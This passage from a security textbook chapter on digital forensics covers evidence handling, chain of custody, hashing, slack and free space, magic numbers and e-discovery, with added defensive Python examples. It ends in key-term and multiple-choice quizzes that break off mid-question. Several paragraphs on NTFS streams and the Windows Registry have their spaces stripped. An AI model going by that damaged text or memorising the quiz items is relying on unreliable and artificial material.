Store the evidence in an evidence room that has low traffic, restricted access, camera monitoring, and entry-logging capabilities. Store components in static-free bags, foam packing material, and cardboard boxes, and inside metal tamper-resistant cabinets or safes whenever possible. Many of today's electronics are sensitive to environmental factors. It is important for storage areas to have environmental controls to protect devices from temperature and humidity changes. It is also prudent to have environmental-monitoring devices to ensure that temperature and humidity remain within safe ranges for electronic devices.
Conducting the Investigation
When analyzing computer storage components, you must use extreme caution. A copy of the system should be analyzed, never the original system, as that will have to serve as evidence. A system specially designed for forensic examination, known as a forensic workstation, can be used. Forensic workstations typically contain hard drive bays, write blockers, analysis software, and other devices to safely image and protect computer forensic data. Analysis should be done in a controlled environment with physical security and controlled access.
Exam Tip: Never analyze the seized system directly. Always make multiple images of the device and analyze a copy.
Tech Tip
Tools of the Trade
Disk wipe utilities Tools to completely delete files and overwrite contents
File viewers Text and image viewers
Forensic programs Tools to analyze disk space, file content, system configuration, and so on
Forensic workstations Specialized workstations containing hardware, software, and component interface capabilities to perform computer forensic activities
Hard drive tools Partition-viewing utilities, bootable CDs
Unerase tools Tools to reverse file deletions
Remember that witness credibility is extremely important. It is easy to imagine how quickly credibility can be damaged if the witness is asked, "Did you lock the file system?" and can't answer affirmatively. Or, when asked, "When you imaged this disk drive, did you use a new destination drive?" the witness can't answer that the destination disk was new or had been forensically wiped (every sector overwritten and verified) before data was copied to it. One of the key elements to preserving the chain of custody, protecting evidence, and having copies of data for analysis is the concept of digital forensic duplication of data. A digital forensic copy is a carefully controlled copy that has every bit the same as the original. Not just files, but all data structures associated with the device, including unused space, are copied in a digital forensic image copy, every bit, bit by bit. Making this type of copy is not something done with normal file utilities; specialty programs are required.
When conducting a digital forensic investigation, consider local laws. Many states require that independent investigators be licensed private investigators. If you are working as an analyst on in-house systems, the laws may have differing levels of applicability. Before consulting, it is best to investigate the need for a license.
It is also important not to interface with the digital media using the host system, as all file systems both read and write to the storage media as part of their normal operation (replaying journals, updating access times, and the like), altering the media. This type of alteration changes information, potentially damaging the trace evidence needed in the investigation. For this reason, a write blocker is commonly used to connect the media to the investigator's computer. Figure 23.3 shows a kit that contains both write blockers and a forensic duplicator.
• Figure 23.3 (a) Write blocker devices and (b) forensic duplicator device
It is common for forensic duplicator devices to have additional features to assist an investigator, such as making multiple copies at once and calculating hash values for the device and the duplicate. Capturing the hash values for all items is an essential first step in handling any digital evidence.
Tech Tip
Forensics-Based Drive Imaging
When a forensic investigation on a series of computers is needed to determine facts in a computer investigation, a variety of methods can be used to discover and recover the evidence. For example, if a developer group is being investigated, the investigator could look at each machine and find the specific evidence that is being sought. The problem with this approach is that in the process of doing the investigation, the other developers in the area become aware and have a chance to destroy critical evidence. For this reason, and to minimize disruption to a team, many times the investigation begins with a large-scale forensic duplication effort. The steps are remarkably simple and well practiced by many investigative firms:
1. Document the scope of the machines being investigated, noting the number of drives and sizes.
2. Send in a team after hours to do the duplication.
3. Open each machine, disconnect the hard drives, and attach external cables.
4. Duplicate each drive using a forensic duplication procedure that makes a complete image of the hard drive on a separate media source, connecting the source through a write blocker and recording the hash values of both the source drive and the image.
5. Reassemble the machines, leaving no evidence that the duplication was performed.
The forensic images are then examined one by one at a later time, away from inquisitive and prying eyes.
Analysis
After successfully imaging the drives to be analyzed and calculating and storing the message digests, the investigator can begin the analysis. The details of the investigation will depend on the particulars of the incident being investigated. However, in general, the following steps will be involved:
1. Check the Recycle Bin for deleted files.
2. Check the web browser history files and address bar histories.
3. Check the web browser cookie files. Different web browsers store cookies in different places.
4. Check the Temporary Internet Files folders.
5. Search files for suspect character strings. To conserve valuable time, be wise in the choice of words you search for, choosing "confidential," "sensitive," "sex," or other explicit words and phrases related to your investigation.
6. Search the slack and free space for suspect character strings (these areas are described under File Systems in the Host Forensics section).
The number of files stored on today's hard drives can be very large, literally hundreds of thousands of files. Obviously this is far too many for the investigator to directly analyze. However, by matching the message digests for files installed by the most popular software products to the message digests of files on the drive being analyzed, the investigator can avoid analyzing approximately 90 percent of the files because he can assume they are unmodified. The National Software Reference Library (NSRL) collects software from various sources and incorporates file profiles into a Reference Data Set available for download as a service. See www.nsrl.nist.gov.
The CAINE Computer Forensics Linux Live Distro and SANS Investigative Forensic Toolkit (SIFT) are just two examples of the many tools you can use to perform computer forensic activities.
Tech Tip
Cleanup: Possible Remediation Actions After an Attack
These are things you'll need to do to restore your system after you've responded to an incident and completed your initial investigation:
Place the system behind a firewall.
Reload the OS.
Run scanners.
Install security software.
Remove unneeded services and applications.
Apply patches.
Restore the system from backup.
Chain of Custody
Evidence, once collected, must be properly controlled to prevent tampering. The chain of custody accounts for all persons who handled or had access to the evidence. The chain of custody shows who obtained the evidence, when and where it was obtained, where it was stored, and who had control or possession of the evidence for the entire time since the evidence was obtained. The following shows critical steps in a chain of custody:
1. Record each item collected as evidence.
2. Record who collected the evidence, along with the date and time it was collected or recorded.
3. Write a description of the evidence in the documentation.
4. Put the evidence in containers and tag the containers with the case number, the name of the person who collected it, and the date and time it was collected or put in the container.
5. Record all message digest (hash) values in the documentation.
6. Securely transport the evidence to a protected storage facility.
7. Obtain a signature from the person who accepts the evidence at this storage facility.
8. Provide controls to prevent access to and compromise of the evidence while it is being stored.
9. Securely transport the evidence to court for proceedings.
Message Digest and Hash
If files, logs, and other information are going to be captured and used for evidence, you need to ensure that the data isn't modified. In most cases, a tool that implements a hashing algorithm to create message digests is used. The mathematics behind hashing algorithms has been researched extensively, and although it is possible that two different data streams could produce the same message digest, for a sound algorithm it is computationally infeasible to find such a pair. Most forensic tools still report MD5 hashes, although the industry is shifting to the SHA-2 and SHA-3 series and the tools are catching up. Because practical collision attacks against MD5 have been known since 2004, a good practice is to record an MD5 value alongside a SHA-256 value rather than relying on MD5 alone. Hashing is covered in detail in Chapter 5.
Cross Check
Hash Algorithms and Forensics
Hash algorithms offer digital forensics the ability to "bag and tag" evidence. Although a hash does not protect the evidence from tampering, it provides clear proof of whether or not data has been changed. This is a very important issue to resolve, given how easy it is to change digital data and the fact that typically no trace is left of the change. A complete review of hashing algorithms is found in Chapter 5. The important question regarding hashes and forensics is this: How and where do you record hash values to protect their integrity as part of the investigative process?
A hashing algorithm performs a function similar to the familiar parity bits, checksum, or cyclical redundancy check (CRC). It applies mathematical operations to a data stream (or file) to calculate a fixed-size number that is, for practical purposes, unique to the information contained in the data stream (or file). Unlike a checksum or CRC, a cryptographic hash is designed so that an attacker cannot deliberately craft a change that leaves the value unchanged. If a subsequent hash created on the same data stream results in a different hash value, the data stream was changed; if the values match, the data is unchanged. The hash tool is applied to each file or log, and the message digest value is noted in the investigation documentation. It is a good practice to write the logs to write-once media such as CD-ROM. When the case actually goes to trial, the investigator may need to run the tool on the files or logs again to show that they have not been altered in any way since being obtained.
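Here is an added example (not code from the book) of the "bag and tag" process in Python. It streams each collected file through MD5 and SHA-256, records the digests together with the case number, collector and the clock offset measured on the live system in a manifest, re-verifies the manifest later, and screens files against a known-good hash set in the way the NSRL Reference Data Set is used in the Analysis section above. The evidence files, the case number, the collector name and the "known-good" set are all constructed for the demonstration; only the hashlib behavior is real.

```python
"""Bag and tag: hash evidence at collection, verify it later, and screen out
known-good files with a reference hash set.

Added example, not code from the book. The evidence files, the case number,
the collector name and the 'known-good' reference set are constructed for
the demonstration; the real NSRL data set is not used here.
"""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20   # hash in 1 MiB pieces so a large image need not fit in RAM


def hash_file(path, algorithms=("md5", "sha256")):
    """Return {algorithm: hexdigest} for one file, read in chunks."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for piece in iter(lambda: fh.read(CHUNK), b""):
            for h in hashers.values():
                h.update(piece)
    return {name: h.hexdigest() for name, h in hashers.items()}


def build_manifest(paths, case_number, collector, clock_offset_seconds=0):
    """Record what was collected, by whom, when, and each item's digests.

    clock_offset_seconds is (system clock minus true time) as measured on the
    live system, so file timestamps can be corrected during analysis.
    """
    return {
        "case": case_number,
        "collector": collector,
        "collected_utc": datetime.now(timezone.utc).isoformat(),
        "clock_offset_seconds": clock_offset_seconds,
        "items": [{"path": p, "size": os.path.getsize(p), "digests": hash_file(p)}
                  for p in paths],
    }


def verify_manifest(manifest):
    """Re-hash every item and report 'intact', 'ALTERED' or 'missing'."""
    results = []
    for item in manifest["items"]:
        path = item["path"]
        if not os.path.exists(path):
            results.append((path, "missing"))
            continue
        current = hash_file(path, tuple(item["digests"]))
        results.append((path, "intact" if current == item["digests"] else "ALTERED"))
    return results


def filter_known_files(paths, known_sha256):
    """Drop files whose SHA-256 appears in a known-good set (NSRL-style);
    what remains is what the examiner actually has to look at."""
    return [p for p in paths
            if hash_file(p, ("sha256",))["sha256"] not in known_sha256]


def demo(workdir=None):
    """Constructed scenario: three collected files, one edited after collection."""
    workdir = workdir or tempfile.mkdtemp(prefix="evidence-")
    log = os.path.join(workdir, "auth.log")
    binary = os.path.join(workdir, "ls")
    empty = os.path.join(workdir, "empty.tmp")
    with open(log, "w") as fh:
        fh.write("Jan 10 02:14:07 host sshd[411]: Accepted password for bob\n")
    with open(binary, "wb") as fh:
        fh.write(b"\x7fELF" + b"\x00" * 60)    # stand-in for a stock OS binary
    open(empty, "wb").close()

    manifest = build_manifest([log, binary, empty], "2016-0042", "Examiner A",
                              clock_offset_seconds=-137)
    before = verify_manifest(manifest)

    # The reference set lists only the stock binary; the log and the empty
    # file are not 'known' and therefore stay in scope for examination.
    known = {hash_file(binary, ("sha256",))["sha256"]}
    to_examine = filter_known_files([log, binary, empty], known)

    # Someone appends to the log after collection: verification must catch it.
    with open(log, "a") as fh:
        fh.write("Jan 10 02:14:09 host sshd[411]: session opened for bob\n")
    after = verify_manifest(manifest)
    return manifest, before, to_examine, after


if __name__ == "__main__":
    manifest, before, to_examine, after = demo()
    for item in manifest["items"]:
        print(item["path"], item["digests"]["sha256"])
    print("before:", before)
    print("to examine:", to_examine)
    print("after:", after)
```

The manifest is what goes on the write-once media; in practice it is itself hashed and that value is written into the custody log by hand, so that the document attesting to the evidence cannot be quietly regenerated.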
Host Forensics
Host forensics refers to the analysis of a specific system. Host forensics includes a wide range of elements, including the analysis of file systems and artifacts of the operating system. These elements often are specific to individual systems and operating systems, such as Linux or Windows.
File Systems
When a user deletes a file, the file is not actually deleted. Instead, the file system's record of it is marked unused: on a FAT volume the directory entry is flagged as deleted and the file's clusters are released in the file allocation table; on NTFS the file's record in the Master File Table is marked as not in use. That record was used by the operating system to track down the file when it was referenced, and the act of "deleting" the file merely removes it and marks the cluster(s) holding the file as available for the operating system to use. The actual data originally stored on the disk remains on the disk (until that space is used again); it just isn't recognized as a coherent file by the operating system.
Partitions
Physical storage devices can be divided into a series of containers called partitions. A partition is a logical storage unit that is subsequently used by an operating system. Systems can have multiple partitions for a wide variety of reasons, ranging from hosting multiple operating systems to performance-maximizing efforts to protection efforts. The broad issue of partition operation and management is outside the scope of this chapter, but this is a critical topic to understand and examine when looking at a system forensically.
Free Space
Since a deleted file is not actually completely erased or overwritten, it sits on the hard disk until the operating system needs to use that space for another file or application. Sometimes the second file that is saved in the same area does not occupy as many clusters as the first file, so a fragment of the original file is left over. The clusters that still hold fragments of the original file are referred to as free space because the operating system has marked them as usable when needed. As soon as the operating system stores something else in such a cluster, it is considered allocated. The unallocated clusters still contain the original data until the operating system overwrites them. Looking at the free space might reveal information left over from files the user thought were deleted from the drive.
Slack Space
Another place that should be reviewed is slack space, which is different from free space. When a file is saved to a hard drive or other storage medium, the operating system allocates space in blocks of a predefined size, called clusters. Even if your file contains only ten characters, the operating system will allocate a full cluster, with space left over in the cluster. This is slack space. It is possible for a user to hide malicious code, tools, or clues in slack space, as well as in the free space. You may also find information in slack space from files that previously occupied that same cluster. Therefore, an investigator should review slack space using utilities that can display the information stored in these areas.
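To make the free-space and slack-space discussion concrete, here is an added example (not from the book) that models a tiny cluster-based disk in Python. The cluster size, the "file system" and the file contents are all constructed; the point is to show where a deleted memo's bytes end up after a shorter file reuses its first cluster, and how a printable-string search over slack and unallocated space (the same idea as the `strings` utility run over an image) recovers them.

```python
"""Free space and slack space on a simulated disk.

Added example, not from the book: an in-memory cluster-based 'disk' shows
why a deleted file's bytes survive, where slack space comes from, and how
a string search over unallocated and slack areas recovers them. All file
contents are constructed.
"""
import re

CLUSTER = 512        # cluster size in bytes (real file systems use 4 KiB or more)
N_CLUSTERS = 16


class ToyDisk:
    def __init__(self):
        self.media = bytearray(N_CLUSTERS * CLUSTER)
        self.free = list(range(N_CLUSTERS))   # the allocation bitmap, as a list
        self.files = {}                       # name -> (clusters, size): the 'directory'

    def write(self, name, data):
        needed = -(-len(data) // CLUSTER)     # ceiling division
        if needed > len(self.free):
            raise OSError("disk full")
        clusters = self.free[:needed]
        del self.free[:needed]
        for i, c in enumerate(clusters):
            chunk = data[i * CLUSTER:(i + 1) * CLUSTER]
            # Only the bytes actually written are replaced; the tail of the
            # last cluster keeps whatever was there before. That tail is slack.
            self.media[c * CLUSTER:c * CLUSTER + len(chunk)] = chunk
        self.files[name] = (clusters, len(data))

    def delete(self, name):
        # 'Deleting' drops the directory entry and releases the clusters;
        # the bytes on the media are untouched.
        clusters, _ = self.files.pop(name)
        self.free = sorted(self.free + clusters)

    def read(self, name):
        clusters, size = self.files[name]
        data = b"".join(self.media[c * CLUSTER:(c + 1) * CLUSTER] for c in clusters)
        return bytes(data[:size])

    def slack_space(self):
        """Bytes between each file's logical end and the end of its last cluster."""
        out = {}
        for name, (clusters, size) in self.files.items():
            if not clusters:
                continue
            used_in_last = size - (len(clusters) - 1) * CLUSTER
            last = clusters[-1]
            out[name] = bytes(self.media[last * CLUSTER + used_in_last:(last + 1) * CLUSTER])
        return out

    def unallocated_space(self):
        """Every cluster the allocation bitmap says is free, in order."""
        return b"".join(bytes(self.media[c * CLUSTER:(c + 1) * CLUSTER]) for c in self.free)


def carve_strings(blob, min_len=8):
    """Runs of printable ASCII at least min_len long."""
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, blob)]


def demo():
    disk = ToyDisk()
    # 60 bytes * 20 = 1200 bytes, so the memo occupies three 512-byte clusters.
    memo = b"CONFIDENTIAL: wire 40,000 to account 7731 before the audit. " * 20
    disk.write("memo.txt", memo)
    disk.delete("memo.txt")                         # the user believes it is gone
    disk.write("note.txt", b"grocery list: milk")   # 18 bytes reuse the first cluster
    slack = disk.slack_space()["note.txt"]          # rest of cluster 0: memo bytes 18..511
    free = disk.unallocated_space()                 # clusters 1..15: memo bytes 512..1199
    return disk, carve_strings(slack), carve_strings(free)


if __name__ == "__main__":
    disk, slack_hits, free_hits = demo()
    print("note.txt reads back as:", disk.read("note.txt"))
    print("found in slack:", slack_hits)
    print("found in unallocated space:", free_hits)
```

The same two searches, run over a real forensic image rather than a toy, are what step 6 of the Analysis list asks for; wiping with a disk wipe utility (overwriting every cluster, not just deleting the entry) is what would actually defeat them.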
Hidden Files
There are numerous ways to hide data on a system. One method is to hide files by setting the hidden attribute, which limits the listing of them by standard file utilities. Devised so that system files that should not be directly manipulated are hidden from easy view, this concept raises a broader question with respect to forensics: How can a user hide information from easy accessibility? There is a wide range of methods of hiding files, and any attempt to list them would be long and subject to continual change. The major ones typically encountered include changing a file extension, encryption, streams, and storage on other partitions. We have already covered partitions; it is obvious that a forensic investigation should find, enumerate, and explore all partitions. Streams will be covered in the next section. Encrypted data, by its very nature, is hidden from view. Without the key, modern encryption methods resist any brute-force attempt to determine the contents. It is important to find encrypted data stores and document the locations for later use by legal counsel.
Changing a file's extension does not actually alter the contents or usability of a file. It merely breaks the automated runtime association manager that determines what executable is associated with the file type to properly handle it. The challenge of how to handle file types goes back to the early days of computers, when the magic number method was created. The term magic number describes a series of bytes at or near the beginning of the file that identifies the file format. In some cases the magic number can be read by humans: GIF87a or GIF89a indicates both the Graphics Interchange Format and the version of the specification. Other file types are less obvious, such as a little-endian (Intel byte order) TIFF file, which begins with II followed by 42 as a two-byte integer (hex 49 49 2A 00). Most integrated forensic tool suites handle file identification via magic number and are thus able to find hidden videos, pictures, and other items, typically by reporting every file whose content type does not match its extension. The other thing these tools can do is complete searches across the entire storage structure for strings, and this can find many "hidden" items.
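An added example (not from the book) of magic-number identification in Python: a short signature table, including the GIF and little-endian TIFF signatures just mentioned, is matched against the first bytes of each file and compared with the file's claimed extension to flag renamed files. The signature table is deliberately small, the extension mapping is an assumption about what names are legitimate, and the sample files are constructed headers, not real files.

```python
"""Identify file type by magic number and flag extension mismatches.

Added example, not from the book. The signature table covers a handful of
formats and the sample 'files' are constructed headers.
"""
import os
import struct

# (magic bytes, offset, type). Little-endian TIFF is 'II' then 42 as a
# 16-bit integer (49 49 2A 00); big-endian TIFF is 'MM' then 00 2A.
SIGNATURES = [
    (b"GIF87a", 0, "gif"),
    (b"GIF89a", 0, "gif"),
    (b"II" + struct.pack("<H", 42), 0, "tiff"),
    (b"MM" + struct.pack(">H", 42), 0, "tiff"),
    (b"\x89PNG\r\n\x1a\n", 0, "png"),
    (b"\xff\xd8\xff", 0, "jpeg"),
    (b"%PDF-", 0, "pdf"),
    (b"PK\x03\x04", 0, "zip"),      # also docx/xlsx/jar/apk containers
    (b"\x7fELF", 0, "elf"),
    (b"MZ", 0, "exe"),              # DOS/PE executables, DLLs, drivers
]

# Extensions that legitimately carry each detected type (an assumption for
# this example; a real tool keeps a much larger table).
EXPECTED = {
    "gif": {"gif"}, "tiff": {"tif", "tiff"}, "png": {"png"},
    "jpeg": {"jpg", "jpeg"}, "pdf": {"pdf"},
    "zip": {"zip", "docx", "xlsx", "pptx", "jar", "apk"},
    "elf": {"", "so", "elf"}, "exe": {"exe", "dll", "sys", "scr"},
}


def identify(header):
    """Return the type whose signature matches at its offset, else 'unknown'."""
    for magic, offset, name in SIGNATURES:
        if header[offset:offset + len(magic)] == magic:
            return name
    return "unknown"


def check_file(name, data):
    """Return (detected type, declared extension, mismatch flag)."""
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    kind = identify(data[:16])
    mismatch = kind != "unknown" and ext not in EXPECTED.get(kind, set())
    return kind, ext, mismatch


def scan(files):
    """Map each file name to its check_file() result."""
    return {name: check_file(name, data) for name, data in files.items()}


# Constructed sample files (headers only; real files would be larger).
SAMPLE = {
    "logo.gif": b"GIF89a" + b"\x00" * 10,
    "scan.tif": b"II\x2a\x00\x08\x00\x00\x00",
    "notes.txt": b"GIF87a" + b"\x00" * 10,          # picture renamed to look like text
    "report.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3",
    "holiday.jpg": b"MZ\x90\x00\x03\x00",           # PE executable disguised as a photo
    "readme.md": b"# just text\n",
}


if __name__ == "__main__":
    for name, (kind, ext, bad) in scan(SAMPLE).items():
        print(f"{name:12} type={kind:8} ext={ext:5} {'MISMATCH' if bad else 'ok'}")
```

Two caveats a practitioner will hit: a file with no known signature is reported as unknown rather than as a mismatch, and plain text, scripts and many archive-in-archive formats have no reliable magic number at all, which is why string searches remain necessary alongside signature matching.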
StreamsStreamsisashortnameforAlternateDataStreams,aspecificdatastructureassociatedwithNTFSinWindows.ThenormallocationfordatainanNTFS-basedsystemisinthedatastream,alocationidentifiedbyarecordintheMasterFileTable(MFT)called$DATA:,whichistechnicallyanunnameddatastream.Alternatedatastreamshavenamesandareidentifiedby$DATA:StreamName,whereStreamNameisthenameofthestreambeingused.Streamscanbeusedtohideinformation;althoughtheinformationisstillpresent,mostofthenormalfileutilitiesdonotdealwithstreams,soitwillnotbeseen.Forensictoolsuiteshavetoolsthatcansearchfor,reporton,andanalyzestreamdataonWindowssystems.
WindowsMetadataMicrosoftWindows–basedsystemshaveawiderangeofartifactswithforensicvalue.Beforeweexaminesomeoftheseartifacts,itisimportant
tounderstandwhytheyexist.Thevastmajorityofartifactsexistforthepurposeofimprovingtheuserexperience.Trackingwhatusersdoandhavedoneandmakingthatinformationavailabletotheoperatingsystemtoimprovefutureuseisoneoftheprimaryreasonsfortheinformation;itsforensicvalueissecondary.
RegistryAnalysisThefirstandforemostWindowsartifactisthesystemRegistry,whichactsadatabaserepositoryofawholehostofinformationandprovidesaone-stopshopforawiderangeofWindowsforensicartifacts—whatapplicationshavebeeninstalled,useractivity,activityassociatedwithexternaldevices,andmore.Althoughthespecificartifactsneededinaninvestigationdifferbasedonthescopeoftheinvestigation,itissafetoassumethatmetadatarecordedbytheWindowsoperatingsystemwillserveausefulpurposeintheinvestigation,especiallysincetheRegistryisstoredbyuserandthereforetheactivityrecordedintheRegistryisattributabletoauser.ThelistofartifactsstoredbytheRegistryisextremelylong,butsomeof
themajoronesincludeeventlogsofawiderangeofsystemandsecurityinformation.Thereisalsoawiderangeoffileactivityartifactsthatcanbeanalyzed,includinganalysisofshellbags,whichprovidesevidenceoffolderopening.LNKfilesandmostrecentlyused(MRU)elementscanpointtofilesystemactivity.Awiderangeofdate/timestampsonfiles,evendeletedfiles,canbepresentforexamination.TherearespecifictoolsetsdesignedtoforensicallyexploretheRegistryandretrievethedesiredartifactsfromthisvoluminousstore.
Tech Tip
Windows USB Analysis
Windows records a wide array of information on each USB device used in the system, including:
Vendor/make/version and possibly unique serial number
Volume name and serial number
Last drive letter assigned
MountPoints2, a registry entry that stores the last drive mapping per user
Username that used the USB device
Time of first USB device connection
Time of last USB device connection
Time of last USB device removal
As mentioned before and will be mentioned again, Windows forensic analysis is no different from any other forensic analysis with respect to forensic procedures. Skill and proficiency in forensic procedures is the most important issue when analyzing a system, because damage may make use of the information impossible.
Linux Metadata
Linux systems have their own sets of artifacts. From a forensics perspective, Linux systems differ from Windows systems in three main ways:
No registry Program data is stored in scattered locations.
Different file system A multitude of different file systems are used, each with different attributes.
Plaintext abounds Files and data tend to be in plaintext, which impacts searching.
The lack of a registry to hold system and program information does not mean that the information is not there; it just means that it is distributed. The same is true of file systems. Rather than offering only two file system structures (NTFS and FAT), Linux comes with a whole host of different forms. Each of these has quirks, such as no file creation dates in many of them, and the zeroing of metadata when files are deleted results in forensic challenges. When it comes to performing forensics on a Linux system, the value of a good sysadmin cannot be overstated. Many of the artifacts of activity on a Linux system are scattered to various local locations, and a good sysadmin can assist in locating and recovering the essential elements for analysis. This is not a license for a sysadmin to begin performing forensic activities! The same rules and procedural requirements listed earlier still apply, and in most cases this necessitates the use of forensically trained professionals.
Device Forensics
Device forensics is the application of digital forensic principles to devices—mobile phones, tablets, the endless list of devices that comprise the “Internet of Things,” and more. The fact that it is a device does not change the principles pertaining to the collection and handling of evidence. All of the forensic principles still apply and are just as important. What does change are the tools and processes employed to retrieve and analyze the data. This is because the file systems, data structures, operating systems, and artifacts are different than those in the world of servers and PCs.
Tech Tip
SSD Forensics
The advent of solid state drives brings substantial improvements in performance. It also brings new issues with respect to forensics. Because of the way the system is designed, a lot of “standard” artifacts that would be found in a magnetic memory system are not present in solid state drives. As these drives are common in devices, forensic analysts have to take all of these technical issues into consideration when attempting to reconstruct what happened.
Network Forensics
Network forensics is the capture, recording, and analysis of network events in order to discover the source of network problems or security incidents. Examining networks in a forensic fashion introduces several challenges. First is scale. The scale of a network is related to the number of nodes and the speed of traffic. Second is the issue of volume. Packet capture is not technically difficult, but it can necessitate large quantities of storage. And although storage is relatively cheap, large numbers of packets can be difficult to sort through and analyze. Because of these issues, network forensics becomes an issue of specificity; if you know what target and what protocols you are looking for, you can selectively capture and analyze the traffic for those segments and have data that is useful. But therein lies the other challenge. Network data is temporal. It exists while the packet is in transit and then it is gone, forever. Metadata such as NetFlow data can provide some information, but it does not contain any content of the data being transmitted. As a general-purpose tool, network forensics is nearly impossible because of the scale issues. But in specific situations, such as in front of high-value targets that have limited data movement, it can prove to be valuable. It can also be valuable in troubleshooting ongoing incidents and problems in the network. The same rules apply to network forensics as apply to all other forensic collection efforts. Preserving the integrity of the data is paramount, and maintaining control over the data is always a challenge. Forensic rules (admissibility, chain of custody, etc.) do not change because the source of data has changed.
E-Discovery
Electronic discovery, or e-discovery, is the term used for the document and data production requirements as part of legal discovery in civil litigation. When a civil lawsuit is filed, under court approval, a firm can be compelled to turn over specific data from systems pursuant to the legal issue at hand. Electronic information is considered to be the same as paper documents in some respects and completely different in others. The evidentiary value can be identical. The fragility can be substantial—electronic records can be changed without leaving a trace. Electronic documents can also have metadata associated with the documents, such as who edited the document, previous version information, and more. One of the pressing challenges in today’s enterprise record store is the maintenance of the volumes of electronic information. Keeping track of the information stores based on a wide range of search terms is essential to comply with e-discovery requests. It is common for systems to use forensic processes and tools to perform e-discovery searches.
Reference Model
EDRM, a coalition of consumers and providers focused on improving e-discovery and information governance, has created a reference model for e-discovery. The Electronic Discovery Reference Model, shown in Figure 23.4, provides a framework for organizations to prepare for e-discovery. The major steps of the framework are thoroughly described on the EDRM website (http://edrm.net). Additional resources available from EDRM include XML schemas, glossaries, metrics, and more.
• Figure 23.4 Electronic Discovery Reference Model (courtesy of EDRM, EDRM.net)
Big Data
It may seem that big data is all the rage in business today, but in reality it is simply a description of the times. We have created large data stores in most enterprises, a byproduct of cheap storage and the ubiquity of the Internet. Big data is an issue in e-discovery as well. The cataloging, storage, and maintenance of corporate records often becomes a big data issue. This facilitates the use of big data methods in many cases. This is an area of rapid development, both for forensics and e-discovery, as data volumes continue to grow exponentially.
Cloud
The cloud has become a resource for enterprise IT systems, and as such it is intimately involved in both e-discovery and forensics. Having data that may or may not be directly accessed by the tools of e-discovery and forensics can complicate the needed processes. An additional complication is the legal issues associated with the contracts between the organization and the cloud provider. As both forensics and e-discovery are secondary processes from a business perspective, they may or may not be addressed in a standard cloud agreement. Because these processes can become important—and if they do, it may be too late to contractually address them—it behooves an organization to prepare by addressing them in cloud agreements with third parties.
Chapter 23 Review
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about incident response and forensics.
Explore the basics of digital forensics
Digital forensics is the collection of processes and procedures used to prepare digital information for use in legal or administrative proceedings.
Because of the importance of veracity and the fragility of digital data to integrity violations that cannot be detected, it is imperative that processes be complete and comprehensive.
Identify the rules and types of evidence
Evidence must meet the three standards of being sufficient, competent, and relevant if it is to be used in legal proceedings.
There are four different types of evidence: direct, real, documentary, and demonstrative.
There are three rules regarding evidence: the best evidence rule, the exclusionary rule, and the hearsay rule.
Collect evidence
Evidence must be properly collected, protected, and controlled to be of value during court or disciplinary activities.
When acquiring evidence, one must be deliberate to ensure evidence is not damaged and operations are not negatively impacted.
Preserve evidence
Evidence must be properly marked so that it can be readily identified as that particular piece of evidence gathered at the scene.
Evidence must be protected so that it is not tampered with, damaged, or compromised.
Evidence should be transported cautiously to ensure custody of the evidence is maintained and the evidence itself is not tampered with or damaged.
Evidence should be stored in properly controlled areas and conditions.
When conducting an investigation on computer components, one must be deliberate and cautious to ensure evidence is not damaged.
Maintain a viable chain of custody
A chain of custody that accounts for all persons who handled or have access to the evidence must be maintained to prevent evidence tampering or damage.
Investigate a computer crime or policy violation
Information can be recorded and possibly hidden in various ways on a computer. Sometimes information will be hidden in either the free space or the slack space of the computer’s disk drive.
Free space is the space (clusters) on a storage medium that is available for the operating system to use.
Slack space is the unused space on a disk drive created when a file is smaller than the allocated unit of storage, such as a cluster.
The use of a message digest or hashing algorithm is essential to ensure that information stored on a computer’s disk drives has not been changed.
If the information in the data stream or file is changed, a different message digest will result, indicating the file has been tampered with.
Forensic analysis of data stored on a hard drive can begin once the drive has been imaged and message digests of important files have been calculated and stored.
Analysis typically involves investigating the Recycle Bin, web browser and address bar history files, cookie files, temporary Internet file folders, suspect files, and free space and slack space.
Experience and knowledge are your most valuable tools available when performing computer forensic activities.
Examine system artifacts
Different systems can have different artifacts based on the operating system and equipment employed.
Windows and Linux systems have many similar artifacts, although they are located in different areas and preserved in different ways.
Develop forensic policies and procedures
The overarching principle for all digital forensic investigations is proper procedures. Any deviation from proper procedures can permanently alter evidence and render information unusable in follow-on procedures, whether criminal, civil, or administrative. Ensuring proper procedures by trained professionals is essential from the first aspect of an investigation.
Examine the policies and procedures associated with e-discovery
E-discovery is the term used for the document and data production requirements as part of legal discovery in civil litigation.
The Electronic Discovery Reference Model provides a framework for organizations to prepare for e-discovery.
Key Terms
best evidence rule (677)
competent evidence (677)
demonstrative evidence (676)
device forensics (688)
direct evidence (676)
documentary evidence (676)
evidence (675)
exclusionary rule (677)
forensics (675)
free space (686)
hearsay rule (677)
magic number (687)
network forensics (689)
partition (686)
real evidence (676)
relevant evidence (677)
slack space (686)
stream (687)
sufficient evidence (677)
write blocker (683)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. Evidence collected in violation of the Fourth Amendment of the U.S. Constitution, the Electronic Communications Privacy Act (ECPA), or other aspects of the U.S. Code may not be admissible to a court under the terms of the _______________.
2. Evidence that is legally qualified and reliable is _______________.
3. Documents, verbal statements, and material objects admissible in a court of law are called _______________.
4. The rule whereby courts prefer original evidence rather than a copy to ensure that no alteration of the evidence (whether intentional or unintentional) has occurred is termed the _______________.
5. Evidence that is convincing or measures up without question is _______________.
6. _______________ is the preservation, identification, documentation, and interpretation of computer data to be used in legal proceedings.
7. _______________ is evidence that is material to the case or has a bearing on the matter at hand.
8. _______________ is the unused space on a disk drive when a file is smaller than the allocated unit of storage.
9. _______________ is oral testimony or other evidence that proves a specific fact (such as an eyewitness’s statement, fingerprint, photo, and so on). The knowledge of the facts is obtained through the five senses of the witness. There are no inferences or presumptions.
10. _______________ is the remaining sectors of a previously allocated file that are available for the operating system to use.
Multiple-Choice Quiz
1. Which of the following correctly defines evidence as being competent?
A. The evidence is material to the case or has a bearing on the matter at hand.
B. The evidence is presented in the form of business records, printouts, or other items.
C. The evidence is convincing or measures up without question.
